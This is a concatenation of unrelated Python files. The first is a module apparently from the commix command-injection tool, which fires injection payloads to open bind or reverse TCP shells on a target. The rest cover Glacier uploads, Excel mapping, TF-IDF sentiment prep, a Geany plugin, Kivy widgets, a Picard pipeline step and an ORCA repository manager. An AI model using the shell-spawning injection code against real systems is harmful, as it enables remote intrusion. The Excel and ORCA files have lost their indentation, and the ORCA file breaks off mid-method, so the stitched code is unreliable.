from src.core.injections.results_based.techniques.classic import cb_injector
from src.core.injections.results_based.techniques.eval_based import eb_injector
from src.core.injections.semiblind.techniques.file_based import fb_injector
"""
Check for established connection
"""
def check_established_connection():
  """Poll `netstat` until no ESTABLISHED connection on settings.LPORT remains.

  Blocks the caller while the spawned reverse/bind TCP session is alive;
  returns once the connection disappears from the netstat output.
  """
  while True:
    if settings.VERBOSITY_LEVEL == 1:
      print ""
    warn_msg = "Something went wrong with the reverse TCP connection."
    warn_msg += " Please wait while checking state."
    print settings.print_warning_msg(warn_msg)
    time.sleep(10)
    # One line per socket; match the listening port as an exact token.
    lines = os.popen('netstat -anta').read().split("\n")
    found = False
    for line in lines:
      if "ESTABLISHED" in line and settings.LPORT in line.split():
        found = True
        pass
    if not found:
      return
"""
Execute the bind / reverse TCP shell
"""
def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE):
  """Fire the injection that spawns the bind/reverse TCP shell and verify it.

  Routes the payload through the active injector (eval-, file- or
  classic/results-based, per settings.*_STATE), then uses the request's
  elapsed time as a heuristic that the shell process started.
  """
  if settings.EVAL_BASED_STATE != False:
    # Command execution results.
    start = time.time()
    response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
    end  = time.time()
    diff = end - start
    # Evaluate injection results.
    shell = eb_injector.injection_results(response, TAG, cmd)
  else:
    # Command execution results.
    start = time.time()
    if settings.FILE_BASED_STATE == True:
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    else:
      whitespace = settings.WHITESPACE[0]
      if whitespace == " ":
        whitespace = urllib.quote(whitespace)
      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
    end  = time.time()
    diff = end - start
    # Evaluate injection results.
    shell = cb_injector.injection_results(response, TAG, cmd)
  # Heuristic: a request that took 1-5 whole seconds suggests the shell
  # payload executed (it blocks the response); then watch the connection.
  if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6):
    check_established_connection()
  else:
    if settings.VERBOSITY_LEVEL == 1:
      print ""
    err_msg = "The " + os_shell_option.split("_")[0] + " "
    err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!"
    print settings.print_critical_msg(err_msg)
"""
Configure the bind TCP shell
"""
def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
  """Configure RHOST/LPORT for a bind TCP shell, then run it.

  May hand over to reverse_tcp_config() when the user switches mode.
  Returns the (go_back, go_back_again) navigation flags for the shell menu.
  """
  settings.BIND_TCP = True
  # Set up RHOST / LPORT for the bind TCP connection.
  bind_tcp.configure_bind_tcp()
  if settings.BIND_TCP == False:
    # User backed out of bind mode; fall through to reverse TCP if selected.
    if settings.REVERSE_TCP == True:
      os_shell_option = "reverse_tcp"
      reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
    return go_back, go_back_again
  while True:
    if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
      result = checks.check_bind_tcp_options(settings.RHOST)
    else:
      cmd = bind_tcp.bind_tcp_options()
      result = checks.check_bind_tcp_options(cmd)
    # result: 0 = proceed, 1/2 = back out, 3 = switch to reverse TCP.
    if result != None:
      if result == 0:
        go_back_again = False
      elif result == 1 or result == 2:
        go_back_again = True
        settings.BIND_TCP = False
      elif result == 3:
        settings.BIND_TCP = False
        reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
      return go_back, go_back_again
    # execute bind TCP shell
    execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Configure the reverse TCP shell
"""
def reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
  """Configure LHOST/LPORT for a reverse TCP shell, then run it.

  Mirror image of bind_tcp_config(); may hand over to bind_tcp_config()
  when the user switches mode.  Returns the (go_back, go_back_again) flags.
  """
  settings.REVERSE_TCP = True
  # Set up LHOST / LPORT for the reverse TCP connection.
  reverse_tcp.configure_reverse_tcp()
  if settings.REVERSE_TCP == False:
    # User backed out of reverse mode; fall through to bind TCP if selected.
    if settings.BIND_TCP == True:
      os_shell_option = "bind_tcp"
      bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
    return go_back, go_back_again
  while True:
    if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
      result = checks.check_reverse_tcp_options(settings.LHOST)
    else:
      cmd = reverse_tcp.reverse_tcp_options()
      result = checks.check_reverse_tcp_options(cmd)
    # result: 0 = proceed, 1/2 = back out, 3 = switch to bind TCP.
    if result != None:
      if result == 0:
        go_back_again = False
      elif result == 1 or result == 2:
        go_back_again = True
        settings.REVERSE_TCP = False
      elif result == 3:
        settings.REVERSE_TCP = False
        bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
        #reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again)
      return go_back, go_back_again
    # execute reverse TCP shell
    execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Check commix shell options
"""
def check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE):
  """Dispatch a commix os_shell menu option entered by the user.

  Recognised options: "back", "os_shell", "bind_tcp", "reverse_tcp", "quit".
  Returns the updated (go_back, go_back_again) navigation flags.
  """
  os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
  # True/False/"back" all mean "leave the current prompt".
  if os_shell_option == "back" or os_shell_option == True or os_shell_option == False:
    go_back = True
    if os_shell_option == False:
      go_back_again = True
    return go_back, go_back_again
  # The "os_shell" option
  elif os_shell_option == "os_shell":
    warn_msg = "You are already into the '" + os_shell_option + "' mode."
    print settings.print_warning_msg(warn_msg)
    return go_back, go_back_again
  # The "bind_tcp" option
  elif os_shell_option == "bind_tcp":
    go_back, go_back_again = bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
    return go_back, go_back_again
  # The "reverse_tcp" option
  elif os_shell_option == "reverse_tcp":
    go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
    return go_back, go_back_again
  # The "quit" option
  elif os_shell_option == "quit":
    sys.exit(0)
  else:
    return go_back, go_back_again
|
from boto.glacier.layer1 import Layer1
from boto.glacier.concurrent import ConcurrentUploader
import sys
import os.path
from time import gmtime, strftime

# Upload one file to an AWS Glacier vault and append its archive id to a
# local inventory file.
# NOTE(review): placeholder credentials -- must be replaced (or better, read
# from the environment / boto config) before use.
access_key_id = "xxx"
secret_key = "xxx"
target_vault_name = "xxx"
inventory = "xxx"

# FIX: guard against a missing command-line argument (was an IndexError).
if len(sys.argv) < 2:
    print("Usage: %s <file-to-upload>" % sys.argv[0])
    sys.exit(-1)

fname = sys.argv[1]
fdes = os.path.basename(sys.argv[1])
if not os.path.isfile(fname):
    print("Can't find the file to upload")
    sys.exit(-1)

glacier_layer1 = Layer1(aws_access_key_id=access_key_id, aws_secret_access_key=secret_key, is_secure=True)
# 128 MiB parts, single thread.
uploader = ConcurrentUploader(glacier_layer1, target_vault_name, part_size=128*1024*1024, num_threads=1)
archive_id = uploader.upload(fname, fdes)

# FIX: use a context manager so the inventory file is closed even if the
# write raises (the original open/write/close could leak the handle).
with open(inventory, 'a+') as f:
    f.write(archive_id + '\t' + fdes + '\n')

sys.exit(0)
|
from shutil import copyfile
from datetime import datetime
from ExcelMapper.mapper import *
import xlrd
import xlsxwriter
# Row/column matching rules for the three mapper tables.  Each rule maps a
# human-readable label to a predicate over one parsed data row (a dict).
row_rules_sheet1_t1 = {
    'found "risk"': lambda data: 'risk' in data['type'],
    'found "Risk"': lambda data: 'Risk' in data['type'],
    # FIX: the original condition was duplicated verbatim
    # ("... or 'reward' in data['type'].lower()"); one test suffices.
    'found "reward"(ignore letter casing)': lambda data: 'reward' in data['type'].lower()}
# Table 2 reuses the same row rules as table 1.
row_rules_sheet1_t2 = row_rules_sheet1_t1

col_rules_sheet1_t1 = {
    '"high"' : lambda data: 'high' in data['amount'],
    #'return true' : lambda data: True,
    'return false' : lambda data: False}

col_rules_sheet1_t2 = {
    'found "low"' : lambda data: 'low' in data['amount'],
    'return true' : lambda data: True,
    'return false' : lambda data: False}

row_rules_sheet2_t3 = {
    'found "fire"': lambda data: 'fire' in data['type'],
    'found "Fire"': lambda data: 'Fire' in data['type'],
    'found "damage"(ignore letter casing)': lambda data: 'damage' in data['type'].lower()}

col_rules_sheet2_t3 = {
    '"low"' : lambda data: 'low' == data['amount'],
    '"high"': lambda data: 'high' == data['amount']}
def main():
date = str(datetime.now().date())
print "Maping"
excel_template = xlrd.open_workbook("map.xlsx")
copyfile('map.xlsx', "map {}.xlsx".format(date))
excel_data = xlrd.open_workbook("data.xlsx")
t1_excel_mapper = create_mapper(wb=excel_template,table_index=1,row_rules=row_rules_sheet1_t1,col_rules=col_rules_sheet1_t1)
t1_output_data = t1_excel_mapper.run(excel_data)
t2_excel_mapper = create_mapper(wb=excel_template,table_index=2,row_rules=row_rules_sheet1_t2,col_rules=col_rules_sheet1_t2)
t2_output_data = t2_excel_mapper.run(excel_data)
t3_excel_mapper = create_mapper(wb=excel_template,table_index=3,row_rules=row_rules_sheet2_t3,col_rules=col_rules_sheet2_t3)
t3_output_data = t3_excel_mapper.run(excel_data)
workbook = xlsxwriter.Workbook('output {}.xlsx'.format(date))
worksheet = workbook.add_worksheet()
for (row,col),results in t1_output_data.iteritems():
worksheet.write(row, col,len(results))
for (row,col),results in t2_output_data.iteritems():
worksheet.write(row, col,len(results))
worksheet = workbook.add_worksheet()
for (row,col),results in t3_output_data.iteritems():
worksheet.write(row, col,len(results))
workbook.close()
print "Done."
def clone_sheet(to_clone_sheet,new_sheet):
    """Copy every cell value from one worksheet into another, cell by cell."""
    rows, cols = to_clone_sheet.nrows, to_clone_sheet.ncols
    for r in range(rows):
        for c in range(cols):
            new_sheet.write(r, c, to_clone_sheet.cell_value(r, c))
# Script entry point.
if __name__ == "__main__":
    main()
|
import pandas as pd

# Explore TF-IDF features of the Amazon fine-food reviews dataset and
# prepare a train/test split for sentiment classification.
df = pd.read_csv('data/Reviews.csv')
print(df.head(3))
print(df['Text'].head(2))

from sklearn.feature_extraction.text import TfidfVectorizer
tfidf = TfidfVectorizer()
print(tfidf)
print(tfidf.fit(df['Text']))
X = tfidf.transform(df['Text'])
print(X)
# NOTE(review): these lookups assume the words appear in the fitted
# vocabulary; a missing word raises KeyError -- confirm against the corpus.
print([X[1, tfidf.vocabulary_['peanuts']]])
print([X[1, tfidf.vocabulary_['jumbo']]])
print([X[1, tfidf.vocabulary_['error']]])

import numpy as np
df.dropna(inplace=True)
# BUG FIX: the original "df[df['Score'] != 3]" discarded its result, so
# neutral (score == 3) reviews were never actually removed.  Assign it back.
df = df[df['Score'] != 3]
# Label: positive (1) when score > 3, otherwise negative (0).
df['Positivity'] = np.where(df['Score'] > 3, 1, 0)
cols = ['Id', 'ProductId', 'UserId', 'ProfileName', 'HelpfulnessNumerator', 'HelpfulnessDenominator', 'Score', 'Time', 'Summary']
df.drop(cols, axis=1, inplace=True)
df.head(3)

from sklearn.model_selection import train_test_split
X = df.Text
y = df.Positivity
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 0)
print("Train set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive".format(len(X_train),
                                                                                         (len(X_train[y_train == 0]) / (len(X_train)*1.))*100,
                                                                                        (len(X_train[y_train == 1]) / (len(X_train)*1.))*100))
print("Test set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive".format(len(X_test),
                                                                                        (len(X_test[y_test == 0]) / (len(X_test)*1.))*100,
                                                                                        (len(X_test[y_test == 1]) / (len(X_test)*1.))*100))
|
from __future__ import print_function
import gettext
import gi
gi.require_version('Peas', '1.0')
from gi.repository import GObject
from gi.repository import Peas
from gi.repository import Peasy
from gi.repository import Geany
# NOTE(review): hard-coded developer install path -- will not resolve on
# other machines; should come from the install prefix. TODO confirm.
gettext.bindtextdomain("peasy", "/home/kugel/dev/geany.git/build-linux/dest/share/locale")
gettext.textdomain("peasy")
_ = gettext.gettext
class PeasyPyTester(Peasy.Plugin, Peasy.PluginHelp):
    """Minimal Peasy test plugin: opens a scratch document on enable."""
    # BUG FIX: PyGObject registers the GType name via "__gtype_name__".
    # The original "__gtype_name" (no trailing underscores) was silently
    # name-mangled to _PeasyPyTester__gtype_name and never used.
    __gtype_name__ = 'PeasyPyTester'
    object = GObject.property(type=GObject.Object)
    # why is this needed!?
    plugin_info = GObject.property(type=Peas.PluginInfo)
    doc = None  # Geany.Document created in do_enable(), cleared on close

    def on_closed(self, obj, d):
        """Forget our document once Geany closes it."""
        print(d.display_name() + " closed")
        self.doc = None

    def do_enable(self):
        """Plugin activation: open a scratch file and watch for its close."""
        print("do_enable: " + gettext.dgettext("peasy", "Hello from %s!") % self.props.plugin_info.get_name())
        self.doc = Geany.Document.new_file("foo")
        self.geany_plugin.geany_data.object.connect("document-close", self.on_closed)
        return True

    def do_disable(self):
        """Plugin deactivation: close the scratch file if still open."""
        print("do_disable: " + _("%s says bye!") % self.props.plugin_info.get_name())
        if (self.doc and self.doc.is_valid):
            self.doc.close()

    def do_help(self):
        print("Help!!")
|
from kivy.uix.widget import Widget
class HorizontalSpacer(Widget):
    """Invisible widget that claims only horizontal layout space.

    Height is fixed to 0 (size_hint_y disabled) so it stretches along a
    horizontal layout without adding any vertical extent.
    """
    def __init__(self, **kwargs):
        super(HorizontalSpacer, self).__init__( **kwargs)
        self.size_hint_y = None
        self.height=0
class VerticalSpacer(Widget):
    """Invisible widget that claims only vertical layout space.

    Width is fixed to 0 (size_hint_x disabled) so it stretches along a
    vertical layout without adding any horizontal extent.
    """
    def __init__(self, **kwargs):
        super(VerticalSpacer, self).__init__( **kwargs)
        self.size_hint_x = None
        self.width=0
|
import os
from pypers.core.step import CmdLineStep
class ReorderSam(CmdLineStep):
    """Pipeline step wrapping Picard ReorderSam via the CmdLineStep spec."""
    # Declarative step description consumed by the pypers framework: inputs,
    # outputs, params and the command template are all templated from here.
    spec = {
        "version": "0.0.1",
        "descr": [
            "Runs ReorderSam to reorder chromosomes into GATK order"
        ],
        "args":
        {
            "inputs": [
                {
                    "name"     : "input_bam",
                    "type"     : "file",
                    "iterable" : True,
                    "descr"    : "the input bam file",
                },
                {
                    "name"  : "reference",
                    "type"  : "ref_genome",
                    "tool"  : "reordersam",
                    "descr" : "Reference whole genome fasta"
                }
            ],
            "outputs": [
                {
                    "name"  : "output_bam",
                    "type"  : "file",
                    "value" : "dummy",
                    "descr" : "the reordered output bam",
                }
            ],
            "params": [
                {
                    "name"  : "jvm_args",
                    "value" : "-Xmx{{jvm_memory}}g -Djava.io.tmpdir={{output_dir}}",
                    "descr" : "java virtual machine arguments",
                    "readonly" : True
                }
            ]
        },
        "cmd": [
            "/usr/bin/java {{jvm_args}} -jar /software/pypers/picard-tools/picard-tools-1.119/picard-tools-1.119/ReorderSam.jar",
            " I={{input_bam}} O={{output_bam}} CREATE_INDEX=True R={{reference}}"
        ],
        "requirements": {
            "memory": '8'
        }
    }
    def preprocess(self):
        """
        Set output bam name

        Derives "<name>.reord.bam" from the input file name, then defers to
        the framework's standard preprocessing.
        """
        file_name = os.path.basename(self.input_bam)
        self.output_bam = file_name.replace('.bam','.reord.bam')
        super(ReorderSam, self).preprocess()
|
# -*- coding: utf-8 -*-
"""
ORCA Open Remote Control Application
Copyright (C) 2013-2020 Carsten Thielepape
Please contact me by : http://www.orca-remote.org/
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import annotations
import os
from typing import Union
from typing import List
from typing import Dict
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
from kivy.logger import Logger
from ORCA.ui.ShowErrorPopUp import ShowErrorPopUp
from ORCA.utils.TypeConvert import ToUnicode
from ORCA.utils.TypeConvert import EscapeUnicode
from ORCA.utils.Filesystem import AdjustPathToOs
from ORCA.utils.FileName import cFileName
from ORCA.utils.LogError import LogError
from ORCA.vars.Replace import ReplaceVars
from ORCA.vars.Access import SetVar
from ORCA.vars.Actions import Var_DelArray
from ORCA.utils.XML import XMLPrettify
from ORCA.utils.Path import cPath
from ORCA.download.RepManagerEntry import cRepManagerEntry
import ORCA.Globals as Globals
# Module-level singleton: keeps the active manager referenced so it is not
# garbage collected while an upload is in flight (see RepositoryManager()).
oRepositoryManager:Union[cRepositoryManager,None] = None
def RepositoryManager(oPathRepSource:cPath) -> None:
    """ starts RepositoryManager, we make it global to avoid wrong garbage collection

    :param oPathRepSource: root path of the repository sources to collect
    """
    global oRepositoryManager
    oRepositoryManager=cRepositoryManager(oPathRepSource)
    oRepositoryManager.CollectAndUpload()
def CreateRepVarArray(uBaseLocalDir:str) -> None:
    """ Delegates to the active manager's CreateRepVarArray; no-op when no
    manager has been started yet. """
    global oRepositoryManager
    if oRepositoryManager:
        oRepositoryManager.CreateRepVarArray(uBaseLocalDir)
class cRepositoryManager:
""" The Main repository manager class, which uploads all reps to the cloud """
    def __init__(self,oPathRepSource) -> None:
        """ :param oPathRepSource: root path containing the repository sources """
        super(cRepositoryManager, self).__init__()
        # Working lists reset by each Get* collector before reuse.
        self.aFiles:List[str]                           = []
        self.aRepManagerEntries:List[cRepManagerEntry]  = []
        self.aZipFiles:List[Dict]                       = []
        self.oPathRepSource:cPath                       = oPathRepSource
def CollectAndUpload(self) -> None:
""" Collects all Reps and uploads them """
try:
oPath:cPath = Globals.oPathTmp + "RepManager"
oPath.Delete()
self.GetOthers()
self.GetCodesets()
self.GetDefinitions()
self.GetSkins()
self.GetInterfaces()
self.GetLanguages()
self.GetSounds()
self.GetScripts()
self.GetWizardTemplates()
self.GetFonts()
self.CreateRepository()
except Exception as e:
uMsg=LogError(uMsg='Critical failure on Repository Manager ...' ,oException=e)
ShowErrorPopUp(uMessage=uMsg)
def GetOthers(self) -> None:
""" Gets all others reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
self.aFiles=(self.oPathRepSource + 'repositories/orca-remote/repositories/others').GetFileList(bSubDirs = False, bFullPath = True)
for uFn in self.aFiles:
oRepManagerEntry:cRepManagerEntry = cRepManagerEntry(oFileName=uFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Resource not ready for Repository Manager, skipped: '+uFn)
self.SaveRepositoryXML('others','Various ORCA resources')
def GetFonts(self) -> None:
""" Gets all others reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
aFontsFolders:List[str] = Globals.oPathFonts.GetFolderList(bFullPath=True)
for uFontFolder in aFontsFolders:
oFnFontDefinition:cFileName = cFileName(cPath(uFontFolder)) + "fonts.xml"
oRepManagerEntry:cRepManagerEntry = cRepManagerEntry(oFileName=oFnFontDefinition)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Font not ready for Repository Manager, skipped: '+oFnFontDefinition)
self.SaveRepositoryXML('fonts','Font Resources')
def GetCodesets(self) -> None:
""" Gets all codeset reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
self.aFiles=Globals.oPathCodesets.GetFileList(bSubDirs = True, bFullPath = True)
for uFn in self.aFiles:
if uFn.lower().endswith('.xml'):
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=uFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Codeset not ready for Repository Manager, skipped: '+uFn)
self.SaveRepositoryXML('codesets','Orca Genuine Codesets')
def GetSounds(self) -> None:
""" Gets all sounds reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uSound in Globals.oSound.aSoundsList:
oFnSound:cFileName = cFileName(Globals.oPathSoundsRoot + uSound) +"sounds.xml"
oRepManagerEntry:cRepManagerEntry = cRepManagerEntry(oFileName=oFnSound)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Soundset not ready for Repository Manager, skipped: '+oFnSound)
self.SaveRepositoryXML('sounds','Orca Genuine Sounds')
def GetDefinitions(self) -> None:
""" Gets all definition reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uDefinitionName in Globals.aDefinitionList:
oFnFile:cFileName=cFileName().ImportFullPath(uFnFullName='%s/definitions/%s/definition.xml' % (Globals.oPathRoot.string, uDefinitionName))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFnFile)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Definition not ready for Repository Manager, skipped: '+oFnFile)
self.SaveRepositoryXML('definitions','Orca Genuine Definitions')
def GetLanguages(self) -> None:
""" Gets all Language reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uLanguage in Globals.aLanguageList:
oFn:cFileName=cFileName().ImportFullPath(uFnFullName='%s/languages/%s/strings.xml' % (Globals.oPathRoot.string, uLanguage))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Language not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('languages','Orca Genuine Language Files')
def GetInterfaces(self) -> None:
""" Gets all interface reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uInterFaceName in Globals.oInterFaces.aObjectNameList:
oFn:cFileName=cFileName().ImportFullPath(uFnFullName='%s/interfaces/%s/interface.py' % (Globals.oPathRoot.string, uInterFaceName))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromSourceFile():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Interface not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('interfaces','Orca Genuine Interfaces')
def GetScripts(self) -> None:
""" Gets all scripts reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uScriptName in Globals.oScripts.dScriptPathList:
oFn:cFileName=cFileName(Globals.oScripts.dScriptPathList[uScriptName])+'script.py'
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromSourceFile():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Script not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('scripts','Orca Genuine Scripts')
def GetSkins(self) -> None:
""" Gets all skins reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uSkinName in Globals.aSkinList:
oFn:cFileName=cFileName().ImportFullPath(uFnFullName='%s/skins/%s/skin.xml' % (Globals.oPathRoot.string, uSkinName))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Skin not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('skins','Orca Genuine Skins')
def GetWizardTemplates(self) -> None:
""" Gets all wizard reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
aDirs:List[str]=(Globals.oPathRoot + u'wizard templates').GetFolderList()
for uDirName in aDirs:
aDirsSub:List[str]=(Globals.oPathRoot + (u'wizard templates/' + uDirName)).GetFolderList()
for uDirsSub in aDirsSub:
oFn:cFileName=cFileName(Globals.oPathRoot + (u'wizard templates/' + uDirName + "/" + uDirsSub)) + (uDirsSub + ".xml")
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Wizard Template not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('wizard templates','Wizard Templates')
def SaveRepositoryXML(self,uType:str,uDescription:str) -> None:
""" Saves the main repository directory xml """
oVal:Element
uContent:str
uRoot:str
oPath:cPath= Globals.oPathTmp + "RepManager"
oPath.Create()
oPath=oPath+"repositories"
oPath.Create()
oPath=oPath+uType
oPath.Create()
oFnXml:cFileName=cFileName(oPath) +'repository.xml'
oXMLRoot:Element = Element('repository')
oVal = SubElement(oXMLRoot,'version')
oVal.text = '1.00'
oVal = SubElement(oXMLRoot,'type')
oVal.text = uType
oVal = SubElement(oXMLRoot,'description')
oVal.text = uDescription
oXMLEntries:Element = SubElement(oXMLRoot,'entries')
for oEntry in self.aRepManagerEntries:
Logger.debug ('Saving Repository-Entry [%s]' % oEntry.oFnEntry.string)
oEntry.oRepEntry.WriteToXMLNode(oXMLNode=oXMLEntries)
for oSource in oEntry.oRepEntry.aSources:
bZipParentDir:bool = cPath.CheckIsDir(uCheckName=oSource.uLocal)
# Create according Zip
if bZipParentDir:
uUpper:str = os.path.basename(oSource.uSourceFile)
uFinalPath:str = uType
oDest:cFileName = cFileName().ImportFullPath(uFnFullName='%s/RepManager/repositories/%s/%s' % (Globals.oPathTmp.string, uFinalPath, uUpper))
uUpper1:str = os.path.split(os.path.abspath(oSource.uLocal))[0]
uRoot = AdjustPathToOs(uPath=ReplaceVars(uUpper1)+'/')
self.aZipFiles.append({'filename':oSource.uLocal,'dstfilename':oDest.string, 'removepath':uRoot, 'skipfiles':ToUnicode(oEntry.oRepEntry.aSkipFileNames)})
else:
uDest:str = AdjustPathToOs(uPath='%s/RepManager/repositories/%s/%s.zip' % (Globals.oPathTmp.string, uType, os.path.splitext(os.path.basename(oSource.uLocal))[0]))
uRoot = AdjustPathToOs(uPath=Globals.oPathRoot.string + "/" + oSource.uTargetPath)
self.aZipFiles.append({'filename':oSource.uLocal,'dstfilename':uDest, 'removepath':uRoot})
oFSFile = open(oFnXml.string, 'w')
uContent = XMLPrettify(oElem=oXMLRoot)
uContent = ReplaceVars(uContent)
oFSFile.write(EscapeUnicode(uContent))
oFSFile.close()
def CreateRepository(self) -> None:
self.CreateZipVarArray()
SetVar(uVarName="REPMAN_BASELOCALDIR", oVarValue=(Globals.oPathTmp + "RepManager").string)
Globals.oTheScreen.AddActionToQueue(aActions=[{'string': 'call Create Repository'}])
return
def CreateZipVarArray(self) -> None:
SetVar(uVarName="REPMAN_ZIPCNTFILES", oVarValue= str(len(self.aZipFiles)))
Var_DelArray("REPMAN_ZIPSOUREFILENAMES[]")
Var_DelArray("REPMAN_ZIPDESTFILENAMES[]")
Var_DelArray("REPMAN_ZIPREMOVEPATH[]")
Var_DelArray("REPMAN_ZIPSKIPFILES[]")
Var_DelArray("REPMAN_ZIPTYPE[]")
i:int=0
for dZipFile in self.aZipFiles:
uIndex:str = str(i) + "]"
SetVar(uVarName="REPMAN_ZIPSOURCEFILENAMES[" + uIndex ,oVarValue=dZipFile['filename'])
SetVar(uVarName="REPMAN_ZIPDESTFILENAMES[" + uIndex ,oVarValue=dZipFile['dstfilename'])
SetVar(uVarName="REPMAN_ZIPREMOVEPATH[" + uIndex ,oVarValue=dZipFile['removepath'])
uSkipFiles:str = dZipFile.get('skipfiles',None)
if uSkipFiles is not None:
SetVar(uVarName="REPMAN_ZIPSKIPFILES[" + uIndex, oVarValue=dZipFile['skipfiles'])
SetVar(uVarName="REPMAN_ZIPTYPE[" + uIndex,oVarValue= "folder")
else:
SetVar(uVarName="REPMAN_ZIPTYPE[" + uIndex,oVarValue= "file")
i += 1
# noinspection PyMethodMayBeStatic
def CreateRepVarArray(self,uBaseLocalDir:str) -> None:
